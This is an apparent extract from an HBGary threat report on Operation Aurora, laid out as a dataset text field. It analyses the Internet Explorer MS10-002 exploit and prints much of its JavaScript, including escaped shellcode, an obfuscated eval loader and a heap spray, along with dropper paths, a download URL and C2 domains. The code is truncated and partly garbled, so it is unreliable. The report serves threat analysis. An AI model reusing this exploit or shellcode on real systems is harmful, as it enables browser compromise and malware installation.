text
stringlengths
4
429
Operation Aurora was published in the public domain in early
January 2010. Microsoft details the vulnerability in Security
Bulletin MS10-002. Internet Explorer 5.01, Internet Explorer
6, Internet Explorer 6 Service Pack 1, Internet Explorer 7, and
Internet Explorer 8 (except Internet Explorer 6 for supported
editions of Windows Server 2003) are affected. Exploit code
analyzed by HBGary reveals that only Internet Explorer 6
was targeted during Operation Aurora. This vulnerability can
be leveraged by attackers of varying skill levels due to the
JAVASCRIPT EXPLOIT CODE
<html>
<head>
<script>
var sc = unescape(
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805%uffe2%uffff%u3931%ud8
db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2%u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u
8caa%u9e53%u30d4%uda37%ud8d8%u3053%ud9b2%u308
SECTION REMOVED FOR SPACE...
8%udfa7%ufa4a%uc6a8%ubc7c%u4b37%u3cea%u564c%ud2cb%ua174%u3ee1%u1c40%uc755%u8fac%ud5be%u9b27%u7466%u4003%uc8d2%u5820%u770e%u2342
%ucd8b%ub0be%uacac%ue2a8%uf7f7%ubdbc%ub7b5%uf6e9%uacbe%ub9a8%ubbbb%uabbd%uf6ab%ubbbb%ubcf7%ub5bd%uf7b7%ubcb9%ub2f6%ubfa8%u00d8
var sss = Array (826, 679, 798, 224, 770, 427, 819, 770, 707, 805, 693, 679, 784, 707, 280,
238, 259, 819, 336, 693, 336, 700, 259, 819, 336, 693, 336, 700, 238, 287, 413, 224, 833,
SECTION REMOVED FOR SPACE...
735, 427, 336, 413, 735, 420, 350, 336, 336, 413, 735, 301, 301, 287, 224, 861, 840, 637,
735, 651, 427, 770, 301, 805, 693, 413, 875);
var arr = new Array;
for (var i = 0; i < sss.length; i ++) {
arr[i] = String.fromCharCode (sss [i] / 7);
var cc = arr.toString ();
cc = cc.replace (/,/g,
cc = cc.replace (/@/g,
eval (cc);
var x1 = new Array ();
for (i = 0; i < 200; i ++) {
x1 [i] = document.createElement (
COMMENT
x1 [i].data =
var e1 = null;
function ev1 (evt)
e1 = document.createEventObject (evt);
document.getElementById (
).innerHTML =
window.setInterval (ev2, 50);
function ev2 ()
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u
0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0
d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d
for (i = 0; i < x1.length; i ++) {
x1 [i].data = p;
var t = e1.srcElement;
</script>
</head>
<body>
<span id=
><IMG SRC=
aaa.gif
onload=
ev1(event)
width=
height=
></span>
</body>
</html>
HB GARY THREAT REPORT: OPERATION AURORA
public availability of the Metasploit module
ie_aurora.rb
The exploit code used by the original attackers was quickly
improved and added to Metasploit thus greatly expanding the
potential number of attackers and reliability of code.
The JavaScript performs a heap spray attack and injects
the embedded shellcode described below. The JavaScript
exploits the vulnerability in Internet Explorer by copying,
releasing, and then referencing a Document Object Model
(DOM) element.
JAVASCRIPT ARTIFACTS
PATTERN
Initial encrypted dropper download.
Deleted file.
C:\%appdata%\a.exe
Decrypted dropper. Deleted file.
C:\%appdata\b.exe
JavaScript present in Internet Explorer
memory space.
<code listed above>
Download URL present in internet
history during memory analysis.
http://demo1.ftpaccess.cc/
demo/ad.jpg
Other domains associated
with Aurora.
sl1.homelinux.org
360.homeunix.com
ftp2.homeunix.com
update.ourhobby.com
blog1.servebeer.com
The shellcode exists as a Unicode escaped variable (sc)
in the malicious JavaScript listed below. Upon successful
exploitation of Internet Explorer, the shellcode will download
an obfuscated second stage executable from http://demo1.
ftpaccess.cc/demo/ad.jpg which is the dropper. Note: these